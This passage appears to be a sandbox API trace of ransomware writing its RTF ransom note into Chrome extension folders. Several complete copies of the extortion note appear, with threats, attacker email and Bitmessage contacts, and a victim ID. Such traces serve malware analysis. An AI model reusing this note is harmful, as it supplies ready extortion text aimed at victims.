middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2373dc8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x83\x19", lpUsedDefaultChar=0x0) returned 8717 [0289.341] WriteFile (in: hFile=0x2e8, lpBuffer=0x2373dc8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2373dc8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.342] CloseHandle (hObject=0x2e8) returned 1 [0289.342] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\#readme_eman#.rtf")) returned 0x20 [0289.342] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\#readme_eman#.rtf")) returned 0xffffffff [0289.342] GetLastError () returned 0x2 [0289.342] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0289.343] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.343] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b 